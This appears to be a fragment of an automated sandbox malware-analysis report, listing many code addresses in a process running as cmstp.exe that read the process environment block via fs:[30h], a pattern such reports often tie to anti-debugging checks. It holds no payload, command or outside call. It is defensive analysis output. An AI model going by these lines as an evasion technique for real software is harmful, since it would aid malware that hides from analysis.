Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FAE73 mov eax, dword ptr fs:[00000030h]	16_2_050FAE73
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FAE73 mov eax, dword ptr fs:[00000030h]	16_2_050FAE73
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FAE73 mov eax, dword ptr fs:[00000030h]	16_2_050FAE73
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FAE73 mov eax, dword ptr fs:[00000030h]	16_2_050FAE73
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0516FE87 mov eax, dword ptr fs:[00000030h]	16_2_0516FE87
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051546A7 mov eax, dword ptr fs:[00000030h]	16_2_051546A7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A0EA5 mov eax, dword ptr fs:[00000030h]	16_2_051A0EA5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A0EA5 mov eax, dword ptr fs:[00000030h]	16_2_051A0EA5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A0EA5 mov eax, dword ptr fs:[00000030h]	16_2_051A0EA5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A8ED6 mov eax, dword ptr fs:[00000030h]	16_2_051A8ED6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05118EC7 mov eax, dword ptr fs:[00000030h]	16_2_05118EC7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0518FEC0 mov eax, dword ptr fs:[00000030h]	16_2_0518FEC0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051036CC mov eax, dword ptr fs:[00000030h]	16_2_051036CC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E76E2 mov eax, dword ptr fs:[00000030h]	16_2_050E76E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051016E0 mov ecx, dword ptr fs:[00000030h]	16_2_051016E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D9100 mov eax, dword ptr fs:[00000030h]	16_2_050D9100
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D9100 mov eax, dword ptr fs:[00000030h]	16_2_050D9100
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D9100 mov eax, dword ptr fs:[00000030h]	16_2_050D9100
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510513A mov eax, dword ptr fs:[00000030h]	16_2_0510513A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510513A mov eax, dword ptr fs:[00000030h]	16_2_0510513A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F4120 mov eax, dword ptr fs:[00000030h]	16_2_050F4120
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F4120 mov eax, dword ptr fs:[00000030h]	16_2_050F4120
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F4120 mov eax, dword ptr fs:[00000030h]	16_2_050F4120
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F4120 mov eax, dword ptr fs:[00000030h]	16_2_050F4120
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F4120 mov ecx, dword ptr fs:[00000030h]	16_2_050F4120
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB944 mov eax, dword ptr fs:[00000030h]	16_2_050FB944
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB944 mov eax, dword ptr fs:[00000030h]	16_2_050FB944
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DC962 mov eax, dword ptr fs:[00000030h]	16_2_050DC962
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DB171 mov eax, dword ptr fs:[00000030h]	16_2_050DB171
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DB171 mov eax, dword ptr fs:[00000030h]	16_2_050DB171
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05102990 mov eax, dword ptr fs:[00000030h]	16_2_05102990
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05104190 mov eax, dword ptr fs:[00000030h]	16_2_05104190
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FC182 mov eax, dword ptr fs:[00000030h]	16_2_050FC182
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510A185 mov eax, dword ptr fs:[00000030h]	16_2_0510A185
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051551BE mov eax, dword ptr fs:[00000030h]	16_2_051551BE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051551BE mov eax, dword ptr fs:[00000030h]	16_2_051551BE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051551BE mov eax, dword ptr fs:[00000030h]	16_2_051551BE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051551BE mov eax, dword ptr fs:[00000030h]	16_2_051551BE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051061A0 mov eax, dword ptr fs:[00000030h]	16_2_051061A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051061A0 mov eax, dword ptr fs:[00000030h]	16_2_051061A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]	16_2_050F99BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]	16_2_050F99BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F99BF mov eax, dword ptr fs:[00000030h]	16_2_050F99BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]	16_2_050F99BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]	16_2_050F99BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F99BF mov eax, dword ptr fs:[00000030h]	16_2_050F99BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]	16_2_050F99BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]	16_2_050F99BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F99BF mov eax, dword ptr fs:[00000030h]	16_2_050F99BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]	16_2_050F99BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]	16_2_050F99BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F99BF mov eax, dword ptr fs:[00000030h]	16_2_050F99BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051569A6 mov eax, dword ptr fs:[00000030h]	16_2_051569A6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051949A4 mov eax, dword ptr fs:[00000030h]	16_2_051949A4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051949A4 mov eax, dword ptr fs:[00000030h]	16_2_051949A4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051949A4 mov eax, dword ptr fs:[00000030h]	16_2_051949A4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051949A4 mov eax, dword ptr fs:[00000030h]	16_2_051949A4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DB1E1 mov eax, dword ptr fs:[00000030h]	16_2_050DB1E1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DB1E1 mov eax, dword ptr fs:[00000030h]	16_2_050DB1E1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DB1E1 mov eax, dword ptr fs:[00000030h]	16_2_050DB1E1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051641E8 mov eax, dword ptr fs:[00000030h]	16_2_051641E8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05157016 mov eax, dword ptr fs:[00000030h]	16_2_05157016
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05157016 mov eax, dword ptr fs:[00000030h]	16_2_05157016
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05157016 mov eax, dword ptr fs:[00000030h]	16_2_05157016
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A4015 mov eax, dword ptr fs:[00000030h]	16_2_051A4015
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A4015 mov eax, dword ptr fs:[00000030h]	16_2_051A4015
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050EB02A mov eax, dword ptr fs:[00000030h]	16_2_050EB02A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050EB02A mov eax, dword ptr fs:[00000030h]	16_2_050EB02A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050EB02A mov eax, dword ptr fs:[00000030h]	16_2_050EB02A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050EB02A mov eax, dword ptr fs:[00000030h]	16_2_050EB02A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510002D mov eax, dword ptr fs:[00000030h]	16_2_0510002D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510002D mov eax, dword ptr fs:[00000030h]	16_2_0510002D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510002D mov eax, dword ptr fs:[00000030h]	16_2_0510002D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510002D mov eax, dword ptr fs:[00000030h]	16_2_0510002D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510002D mov eax, dword ptr fs:[00000030h]	16_2_0510002D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA830 mov eax, dword ptr fs:[00000030h]	16_2_050FA830
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA830 mov eax, dword ptr fs:[00000030h]	16_2_050FA830
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA830 mov eax, dword ptr fs:[00000030h]	16_2_050FA830
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA830 mov eax, dword ptr fs:[00000030h]	16_2_050FA830
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F0050 mov eax, dword ptr fs:[00000030h]	16_2_050F0050
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F0050 mov eax, dword ptr fs:[00000030h]	16_2_050F0050
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05192073 mov eax, dword ptr fs:[00000030h]	16_2_05192073
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A1074 mov eax, dword ptr fs:[00000030h]	16_2_051A1074
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D9080 mov eax, dword ptr fs:[00000030h]	16_2_050D9080
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05153884 mov eax, dword ptr fs:[00000030h]	16_2_05153884
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05153884 mov eax, dword ptr fs:[00000030h]	16_2_05153884
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510F0BF mov ecx, dword ptr fs:[00000030h]	16_2_0510F0BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510F0BF mov eax, dword ptr fs:[00000030h]	16_2_0510F0BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510F0BF mov eax, dword ptr fs:[00000030h]	16_2_0510F0BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051020A0 mov eax, dword ptr fs:[00000030h]	16_2_051020A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051020A0 mov eax, dword ptr fs:[00000030h]	16_2_051020A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051020A0 mov eax, dword ptr fs:[00000030h]	16_2_051020A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051020A0 mov eax, dword ptr fs:[00000030h]	16_2_051020A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051020A0 mov eax, dword ptr fs:[00000030h]	16_2_051020A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051020A0 mov eax, dword ptr fs:[00000030h]	16_2_051020A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051190AF mov eax, dword ptr fs:[00000030h]	16_2_051190AF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0516B8D0 mov eax, dword ptr fs:[00000030h]	16_2_0516B8D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0516B8D0 mov ecx, dword ptr fs:[00000030h]	16_2_0516B8D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0516B8D0 mov eax, dword ptr fs:[00000030h]	16_2_0516B8D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0516B8D0 mov eax, dword ptr fs:[00000030h]	16_2_0516B8D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0516B8D0 mov eax, dword ptr fs:[00000030h]	16_2_0516B8D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0516B8D0 mov eax, dword ptr fs:[00000030h]	16_2_0516B8D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D58EC mov eax, dword ptr fs:[00000030h]	16_2_050D58EC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB8E4 mov eax, dword ptr fs:[00000030h]	16_2_050FB8E4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB8E4 mov eax, dword ptr fs:[00000030h]	16_2_050FB8E4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D40E1 mov eax, dword ptr fs:[00000030h]	16_2_050D40E1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D40E1 mov eax, dword ptr fs:[00000030h]	16_2_050D40E1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D40E1 mov eax, dword ptr fs:[00000030h]	16_2_050D40E1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519131B mov eax, dword ptr fs:[00000030h]	16_2_0519131B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A8B58 mov eax, dword ptr fs:[00000030h]	16_2_051A8B58
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DDB40 mov eax, dword ptr fs:[00000030h]	16_2_050DDB40
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DF358 mov eax, dword ptr fs:[00000030h]	16_2_050DF358
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05103B7A mov eax, dword ptr fs:[00000030h]	16_2_05103B7A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05103B7A mov eax, dword ptr fs:[00000030h]	16_2_05103B7A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DDB60 mov ecx, dword ptr fs:[00000030h]	16_2_050DDB60
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510B390 mov eax, dword ptr fs:[00000030h]	16_2_0510B390
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E1B8F mov eax, dword ptr fs:[00000030h]	16_2_050E1B8F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E1B8F mov eax, dword ptr fs:[00000030h]	16_2_050E1B8F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05102397 mov eax, dword ptr fs:[00000030h]	16_2_05102397
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519138A mov eax, dword ptr fs:[00000030h]	16_2_0519138A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FEB9A mov eax, dword ptr fs:[00000030h]	16_2_050FEB9A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FEB9A mov eax, dword ptr fs:[00000030h]	16_2_050FEB9A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0518D380 mov ecx, dword ptr fs:[00000030h]	16_2_0518D380
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510138B mov eax, dword ptr fs:[00000030h]	16_2_0510138B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510138B mov eax, dword ptr fs:[00000030h]	16_2_0510138B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510138B mov eax, dword ptr fs:[00000030h]	16_2_0510138B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05104BAD mov eax, dword ptr fs:[00000030h]	16_2_05104BAD
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05104BAD mov eax, dword ptr fs:[00000030h]	16_2_05104BAD
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05104BAD mov eax, dword ptr fs:[00000030h]	16_2_05104BAD
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A5BA5 mov eax, dword ptr fs:[00000030h]	16_2_051A5BA5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051053C5 mov eax, dword ptr fs:[00000030h]	16_2_051053C5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051553CA mov eax, dword ptr fs:[00000030h]	16_2_051553CA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051553CA mov eax, dword ptr fs:[00000030h]	16_2_051553CA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FDBE9 mov eax, dword ptr fs:[00000030h]	16_2_050FDBE9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051003E2 mov eax, dword ptr fs:[00000030h]	16_2_051003E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051003E2 mov eax, dword ptr fs:[00000030h]	16_2_051003E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051003E2 mov eax, dword ptr fs:[00000030h]	16_2_051003E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051003E2 mov eax, dword ptr fs:[00000030h]	16_2_051003E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051003E2 mov eax, dword ptr fs:[00000030h]	16_2_051003E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051003E2 mov eax, dword ptr fs:[00000030h]	16_2_051003E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051823E3 mov ecx, dword ptr fs:[00000030h]	16_2_051823E3
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051823E3 mov ecx, dword ptr fs:[00000030h]	16_2_051823E3
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051823E3 mov eax, dword ptr fs:[00000030h]	16_2_051823E3
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E8A0A mov eax, dword ptr fs:[00000030h]	16_2_050E8A0A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519AA16 mov eax, dword ptr fs:[00000030h]	16_2_0519AA16
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519AA16 mov eax, dword ptr fs:[00000030h]	16_2_0519AA16
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F3A1C mov eax, dword ptr fs:[00000030h]	16_2_050F3A1C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DAA16 mov eax, dword ptr fs:[00000030h]	16_2_050DAA16
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DAA16 mov eax, dword ptr fs:[00000030h]	16_2_050DAA16
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D5210 mov eax, dword ptr fs:[00000030h]	16_2_050D5210
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D5210 mov ecx, dword ptr fs:[00000030h]	16_2_050D5210
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D5210 mov eax, dword ptr fs:[00000030h]	16_2_050D5210
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D5210 mov eax, dword ptr fs:[00000030h]	16_2_050D5210
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]	16_2_050FA229
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]	16_2_050FA229
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]	16_2_050FA229
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]	16_2_050FA229
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]	16_2_050FA229
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]	16_2_050FA229
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]	16_2_050FA229
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]	16_2_050FA229
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]	16_2_050FA229
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB236 mov eax, dword ptr fs:[00000030h]	16_2_050FB236
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB236 mov eax, dword ptr fs:[00000030h]	16_2_050FB236
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB236 mov eax, dword ptr fs:[00000030h]	16_2_050FB236
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB236 mov eax, dword ptr fs:[00000030h]	16_2_050FB236
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB236 mov eax, dword ptr fs:[00000030h]	16_2_050FB236
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB236 mov eax, dword ptr fs:[00000030h]	16_2_050FB236
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05114A2C mov eax, dword ptr fs:[00000030h]	16_2_05114A2C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05114A2C mov eax, dword ptr fs:[00000030h]	16_2_05114A2C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05164257 mov eax, dword ptr fs:[00000030h]	16_2_05164257
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519EA55 mov eax, dword ptr fs:[00000030h]	16_2_0519EA55
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D9240 mov eax, dword ptr fs:[00000030h]	16_2_050D9240
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D9240 mov eax, dword ptr fs:[00000030h]	16_2_050D9240
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D9240 mov eax, dword ptr fs:[00000030h]	16_2_050D9240
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D9240 mov eax, dword ptr fs:[00000030h]	16_2_050D9240
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0511927A mov eax, dword ptr fs:[00000030h]	16_2_0511927A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0518B260 mov eax, dword ptr fs:[00000030h]	16_2_0518B260
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0518B260 mov eax, dword ptr fs:[00000030h]	16_2_0518B260
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A8A62 mov eax, dword ptr fs:[00000030h]	16_2_051A8A62
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510D294 mov eax, dword ptr fs:[00000030h]	16_2_0510D294
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510D294 mov eax, dword ptr fs:[00000030h]	16_2_0510D294
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510FAB0 mov eax, dword ptr fs:[00000030h]	16_2_0510FAB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D52A5 mov eax, dword ptr fs:[00000030h]	16_2_050D52A5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D52A5 mov eax, dword ptr fs:[00000030h]	16_2_050D52A5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D52A5 mov eax, dword ptr fs:[00000030h]	16_2_050D52A5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D52A5 mov eax, dword ptr fs:[00000030h]	16_2_050D52A5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D52A5 mov eax, dword ptr fs:[00000030h]	16_2_050D52A5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050EAAB0 mov eax, dword ptr fs:[00000030h]	16_2_050EAAB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050EAAB0 mov eax, dword ptr fs:[00000030h]	16_2_050EAAB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05102ACB mov eax, dword ptr fs:[00000030h]	16_2_05102ACB
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05102AE4 mov eax, dword ptr fs:[00000030h]	16_2_05102AE4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]	16_2_05194AEF
